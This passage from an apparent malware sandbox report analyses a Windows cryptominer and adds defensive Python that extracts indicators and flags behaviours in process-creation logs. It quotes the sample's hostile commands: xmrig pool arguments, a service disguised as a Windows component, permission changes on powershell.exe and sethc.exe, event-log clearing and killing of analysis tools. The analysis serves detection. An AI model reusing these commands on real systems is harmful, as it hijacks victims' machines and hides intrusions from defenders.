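The miner argv recorded in this tree (identical in the `install SetPipAtcivator rundlls ...` service definition earlier and in the direct `rundlls` invocation just above) is standard xmrig syntax: each `-o` opens a pool entry, and the `-u`, `-k` and `--nicehash` that follow bind to it, so the two `-o` lines give a primary pool and a failover. The `install` / `set DisplayName` / `set Description` / `start` verbs passed to the dropped `svchost.exe` follow NSSM's command syntax, wrapping the miner as a service whose display name mimics a Windows component. The Python below is an added example, not code from the sample or from the sandbox: it parses those strings, copied from the tree, into the indicators a hunter pivots on. The option meanings are taken from xmrig's documented flags; the `Pool` fields and indicator names are my own.

```python
"""Structured indicators from the miner and service command lines in the
process tree above.  Added example; not code from the sample or the sandbox.
Option meanings follow xmrig's documented flags (-o/--url, -u/--user,
-k/--keepalive, -r/--retries, --nicehash, --max-cpu-usage, --donate-level)."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Copied from the tree: the argv the wrapper passes to the dropped miner.
MINER_ARGV = (
    "-o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 "
    "--donate-level=1 -r3 --print-time=5 --nicehash "
    "-o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 "
    "--donate-level=1 -r3 --print-time=5 --nicehash"
)
# Copied from the tree: NSSM-style verbs given to the dropped svchost.exe.
SERVICE_CMDS = [
    "install SetPipAtcivator rundlls " + MINER_ARGV,
    "set SetPipAtcivator DisplayName WMI Performance Services",
    "set SetPipAtcivator Description Identify computers that are connected to the "
    "network, collect and store the properties of these networks, and notify the "
    "application when they are changed.",
    "start SetPipAtcivator",
]
# Options that never take a value, so the next token must not be consumed.
FLAGS_NO_VALUE = {"-k", "--keepalive", "--nicehash", "-B", "--background"}


@dataclass
class Pool:
    scheme: str
    host: str
    port: int
    user: Optional[str] = None
    keepalive: bool = False
    nicehash: bool = False
    options: Dict[str, Optional[str]] = field(default_factory=dict)


def _split_opt(tok: str):
    """'--max-cpu-usage=50' -> ('--max-cpu-usage', '50'); '-r3' -> ('-r', '3')."""
    if tok.startswith("--"):
        name, sep, val = tok.partition("=")
        return name, (val if sep else None)
    if tok.startswith("-") and len(tok) > 2:
        return tok[:2], tok[2:]
    return tok, None


def parse_miner_argv(argv: str) -> List[Pool]:
    """Each -o opens a pool; -u/-k/--nicehash bind to the most recent pool.
    xmrig treats the rate options as global; here they are recorded against
    the pool they followed, so the failover entry keeps its own copy."""
    pools: List[Pool] = []
    toks = shlex.split(argv)
    i = 0
    while i < len(toks):
        name, val = _split_opt(toks[i])
        i += 1
        if not name.startswith("-"):
            continue  # positional token; none are expected in this argv
        if val is None and name not in FLAGS_NO_VALUE and i < len(toks):
            val, i = toks[i], i + 1
        if name in ("-o", "--url"):
            u = urlsplit(val)  # urlsplit accepts the stratum+tcp scheme
            pools.append(Pool(scheme=u.scheme, host=u.hostname, port=u.port))
        elif not pools:
            continue  # option before the first pool; nothing to bind it to
        elif name in ("-u", "--user"):
            pools[-1].user = val
        elif name in ("-k", "--keepalive"):
            pools[-1].keepalive = True
        elif name == "--nicehash":
            pools[-1].nicehash = True
        else:
            pools[-1].options[name] = val
    return pools


def parse_service_cmds(cmds: List[str]) -> Dict[str, object]:
    """Rebuild the service definition from the install/set/start verbs."""
    svc: Dict[str, object] = {}
    for cmd in cmds:
        toks = cmd.split(maxsplit=3)  # verb, service, key-or-app, remainder
        if toks[0] == "install":
            svc["name"], svc["application"] = toks[1], toks[2]
            svc["arguments"] = toks[3] if len(toks) > 3 else ""
        elif toks[0] == "set":
            svc[toks[2]] = toks[3] if len(toks) > 3 else ""
        elif toks[0] == "start":
            svc["started"] = True
    return svc


def indicators(pools: List[Pool], svc: Dict[str, object]) -> Dict[str, object]:
    """Pool endpoints, pool user, CPU cap and the service facade, for hunting."""
    return {
        "pool_endpoints": sorted(f"{p.host}:{p.port}" for p in pools),
        "pool_users": sorted({p.user for p in pools if p.user}),
        "nicehash_mode": any(p.nicehash for p in pools),
        "max_cpu_usage_percent": max(int(p.options.get("--max-cpu-usage", "100")) for p in pools),
        "service_name": svc.get("name"),
        "service_binary": svc.get("application"),
        "service_display_name": svc.get("DisplayName"),
    }


if __name__ == "__main__":
    ioc = indicators(parse_miner_argv(MINER_ARGV), parse_service_cmds(SERVICE_CMDS))
    for k, v in ioc.items():
        print(f"{k}: {v}")
```

The `--max-cpu-usage=50` cap and the `--nicehash` flag are worth keeping as indicators in their own right: the cap is what lets the miner sit under a casual CPU check, and the pool user `boy` plus the two f2pool endpoints are the values to search for across other hosts' process-creation logs.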
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
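Read as a whole, the tree is a miner deployment wrapped in defence evasion. The `cacls` sequence rewrites the DACLs of powershell.exe and sethc.exe so that SERVICE and NETWORK SERVICE are denied, Administrators and Users get read-only access, and SYSTEM is denied on powershell.exe (each `cacls` is paired with a `cmd /c echo y` that answers its confirmation prompt). `wevtutil cl` empties the Security, System and Windows PowerShell logs, `taskkill` removes Task Manager, Process Explorer, Process Hacker, Autoruns and Perfmon, and binaries named svchost.exe and conhost.exe run from C:\Windows\Fonts instead of System32. The Python below is an added example, not part of the sandbox report: a small rule set over process-creation events (image path plus command line, the fields Sysmon Event ID 1 or Security 4688 supply) that flags each of those behaviours. The events are constructed here from command lines copied out of the tree, followed by two benign controls; the rule names and the alert threshold are my own.

```python
"""Rule set over process-creation events for the behaviours seen in the
tree above.  Added example, not part of the sandbox report.  Events are
constructed from command lines copied out of the tree plus two benign
controls; rule names and the alert threshold are my own."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # {"image": full path of the executable, "cmdline": command line}

SYSTEM_DIRS = re.compile(r"^[A-Za-z]:\\Windows\\(System32|SysWOW64)\\", re.I)
SYSTEM_BINARY_TARGET = re.compile(r"[A-Za-z]:\\Windows\\(System32|SysWOW64)\\\S+\.exe", re.I)
SYSTEM_BINARY_NAMES = {"svchost.exe", "conhost.exe", "rundll32.exe", "csrss.exe", "lsass.exe"}
ANALYSIS_TOOLS = {"taskmgr.exe", "procexp.exe", "procexp64.exe", "processhacker.exe",
                  "autoruns.exe", "autoruns64.exe", "perfmon.exe", "procmon.exe"}


def _norm(path: str) -> str:
    """Strip the NT object-manager prefix the sandbox records on some images."""
    return path[4:] if path.startswith("\\??\\") else path


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1].lower()


def event_log_cleared(ev: Event) -> bool:
    # wevtutil cl <log>; query verbs such as 'qe' do not match
    return _basename(ev["image"]) == "wevtutil.exe" and bool(re.search(r"\bcl\b", ev["cmdline"], re.I))


def system_binary_acl_or_owner_change(ev: Event) -> bool:
    # cacls/icacls/takeown aimed at an executable under System32 or SysWOW64
    return (_basename(ev["image"]) in {"cacls.exe", "icacls.exe", "takeown.exe"}
            and bool(SYSTEM_BINARY_TARGET.search(ev["cmdline"])))


def analysis_tool_killed(ev: Event) -> bool:
    if _basename(ev["image"]) != "taskkill.exe":
        return False
    m = re.search(r"/im\s+(\S+)", ev["cmdline"], re.I)
    return bool(m) and m.group(1).lower() in ANALYSIS_TOOLS


def system_binary_name_outside_system_dir(ev: Event) -> bool:
    # svchost.exe / conhost.exe running from anywhere but System32/SysWOW64
    return _basename(ev["image"]) in SYSTEM_BINARY_NAMES and not SYSTEM_DIRS.match(_norm(ev["image"]))


def stratum_pool_in_cmdline(ev: Event) -> bool:
    return bool(re.search(r"stratum\+(tcp|ssl)://", ev["cmdline"], re.I))


def executable_in_fonts_dir(ev: Event) -> bool:
    return bool(re.search(r"\\Windows\\Fonts\\[^\\]+\.exe$", _norm(ev["image"]), re.I))


RULES: Dict[str, Callable[[Event], bool]] = {
    f.__name__: f for f in (event_log_cleared, system_binary_acl_or_owner_change,
                            analysis_tool_killed, system_binary_name_outside_system_dir,
                            stratum_pool_in_cmdline, executable_in_fonts_dir)
}
EVASION_RULES = {"event_log_cleared", "system_binary_acl_or_owner_change", "analysis_tool_killed"}


def scan(events: List[Event]) -> List[Tuple[str, str]]:
    """(rule_name, cmdline) for every rule each event triggers."""
    return [(name, ev["cmdline"]) for ev in events for name, rule in RULES.items() if rule(ev)]


def summarize(hits: List[Tuple[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


def verdict(counts: Dict[str, int]) -> bool:
    """A Stratum miner plus any defence-evasion rule in one tree is a high-confidence alert."""
    return counts.get("stratum_pool_in_cmdline", 0) > 0 and any(counts.get(r, 0) for r in EVASION_RULES)


# Constructed sample: six events copied from the tree, then two benign controls.
EVENTS: List[Event] = [
    {"image": r"C:\Windows\SysWOW64\cacls.exe",
     "cmdline": r"cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE"},
    {"image": r"C:\Windows\SysWOW64\takeown.exe", "cmdline": r"takeown /f C:\Windows\system32\sethc.exe /a"},
    {"image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmdline": 'wevtutil cl "security"'},
    {"image": r"C:\Windows\SysWOW64\taskkill.exe", "cmdline": "taskkill /im ProcessHacker.exe /f /T"},
    {"image": r"\??\c:\windows\Fonts\svchost.exe", "cmdline": r"c:\windows\Fonts\svchost.exe start SetPipAtcivator"},
    {"image": r"\??\c:\windows\Fonts\rundlls.exe",
     "cmdline": '"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --nicehash'},
    {"image": r"C:\Windows\system32\svchost.exe", "cmdline": r"C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted"},
    {"image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil qe Security /c:5 /rd:true"},
]

if __name__ == "__main__":
    hits = scan(EVENTS)
    for name, cmd in hits:
        print(f"{name:40s} {cmd}")
    print("alert:", verdict(summarize(hits)))
```

Note that the log-clearing rule is the one most likely to fire after the evidence is already gone: `wevtutil cl` leaves Event ID 1102 in Security and 104 in System, but the process-creation events it destroys are exactly the ones a host-only investigation would rely on, which is why the events above should be forwarded off the host before any of these rules matter.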
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
  Filesize: 215B
  MD5: 535a478cc80a0fbbf990eed73f8788bb
  SHA1: 459479dadaf00f3fa0de78f640c34dd426fd61aa
  SHA256: 323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
  SHA512: 3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1

C:\Windows\Fonts\conhost.exe (also recorded as \??\c:\windows\Fonts\conhost.exe)
  Filesize: 2.9MB
  MD5: 1b9583c6c3eab1da961aec9e42bfbcb8
  SHA1: c60f85fa6bcc463b3d38b7714916b241f2139650
  SHA256: 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
  SHA512: 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

C:\Windows\Fonts\rundlls.exe (also recorded as \Windows\Fonts\rundlls.exe)
  Filesize: 5.2MB
  MD5: ed499b3a95e11ecf57e5131cd82c2a14
  SHA1: 7f37e85068457497f5f34e73edde4963694cfc19
  SHA256: c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
  SHA512: f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

C:\Windows\Fonts\svchost.exe (also recorded as \??\c:\windows\Fonts\svchost.exe and \Windows\Fonts\svchost.exe; the same file appears 17 times in the original listing with identical hashes)
  Filesize: 87KB
  MD5: c945fa7d5ecb219c248ea09ea3bbe8e4
  SHA1: 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
  SHA256: 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
  SHA512: 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

C:\Windows\TEMP\csonhost.bat
  Filesize: 6KB
  MD5: 9da29265b1391c18f00c959c64b3fb65
  SHA1: dee2f9ded1706933f452ebcd2d5ccd8818af713e
  SHA256: fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
  SHA512: 6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2

\??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the digests of zero-length input; no pipe payload was captured)
- memory/108-75-0x0000000000000000-mapping.dmp
- memory/268-123-0x0000000000000000-mapping.dmp
- memory/296-137-0x0000000000000000-mapping.dmp
- memory/364-88-0x0000000000000000-mapping.dmp
- memory/544-110-0x0000000000000000-mapping.dmp
- memory/544-142-0x0000000000000000-mapping.dmp
- memory/596-112-0x0000000000000000-mapping.dmp
- memory/704-86-0x0000000000000000-mapping.dmp
- memory/784-115-0x0000000000000000-mapping.dmp
- memory/784-144-0x0000000000000000-mapping.dmp
- memory/788-62-0x0000000000000000-mapping.dmp
- memory/836-71-0x0000000000000000-mapping.dmp
- memory/844-117-0x0000000000000000-mapping.dmp
- memory/876-63-0x0000000000000000-mapping.dmp
- memory/904-120-0x0000000000000000-mapping.dmp
- memory/916-54-0x00000000753B1000-0x00000000753B3000-memory.dmp (Filesize 8KB)
- memory/948-116-0x0000000000000000-mapping.dmp
- memory/956-76-0x0000000000000000-mapping.dmp
- memory/972-97-0x0000000000000000-mapping.dmp
- memory/976-68-0x0000000000000000-mapping.dmp
- memory/1040-84-0x0000000000000000-mapping.dmp
- memory/1096-121-0x0000000000000000-mapping.dmp
- memory/1168-125-0x0000000000000000-mapping.dmp
- memory/1204-64-0x0000000000000000-mapping.dmp
- memory/1228-59-0x0000000000000000-mapping.dmp
- memory/1236-99-0x0000000000000000-mapping.dmp
- memory/1332-65-0x0000000000000000-mapping.dmp
- memory/1352-66-0x0000000000000000-mapping.dmp
- memory/1356-92-0x0000000000000000-mapping.dmp
- memory/1416-73-0x0000000000000000-mapping.dmp
- memory/1472-109-0x0000000000000000-mapping.dmp
- memory/1560-118-0x0000000000000000-mapping.dmp
- memory/1560-70-0x0000000000000000-mapping.dmp
- memory/1568-114-0x0000000000000000-mapping.dmp
- memory/1584-113-0x0000000000000000-mapping.dmp
- memory/1616-56-0x0000000000000000-mapping.dmp
- memory/1660-89-0x0000000000000000-mapping.dmp
- memory/1668-102-0x0000000000000000-mapping.dmp
- memory/1680-57-0x0000000000000000-mapping.dmp
- memory/1720-55-0x0000000000000000-mapping.dmp
- memory/1732-74-0x0000000000000000-mapping.dmp
- memory/1768-91-0x0000000000000000-mapping.dmp
- memory/1872-107-0x0000000000000000-mapping.dmp
- memory/1888-69-0x0000000000000000-mapping.dmp
- memory/1912-127-0x0000000000000000-mapping.dmp
- memory/1916-106-0x0000000000000000-mapping.dmp
- memory/1916-87-0x0000000000000000-mapping.dmp
- memory/1924-72-0x0000000000000000-mapping.dmp
- memory/1936-67-0x0000000000000000-mapping.dmp
- memory/1952-140-0x0000000000000000-mapping.dmp
- memory/1952-143-0x0000000000100000-0x0000000000120000-memory.dmp (Filesize 128KB)
- memory/1956-119-0x0000000000000000-mapping.dmp
- memory/1964-61-0x0000000000000000-mapping.dmp
- memory/1976-82-0x0000000000000000-mapping.dmp
- memory/2000-111-0x0000000000000000-mapping.dmp
- memory/2000-96-0x0000000000000000-mapping.dmp
- memory/2000-122-0x0000000000000000-mapping.dmp
- memory/2008-60-0x0000000000000000-mapping.dmp
- memory/2016-129-0x0000000000000000-mapping.dmp
- memory/2016-80-0x0000000000000000-mapping.dmp
- memory/2028-134-0x0000000000000000-mapping.dmp
- memory/2032-78-0x0000000000000000-mapping.dmp
- memory/2032-58-0x0000000000000000-mapping.dmp
- memory/2036-108-0x0000000000000000-mapping.dmp
- memory/2036-77-0x0000000000000000-mapping.dmp
- memory/2044-105-0x0000000000000000-mapping.dmp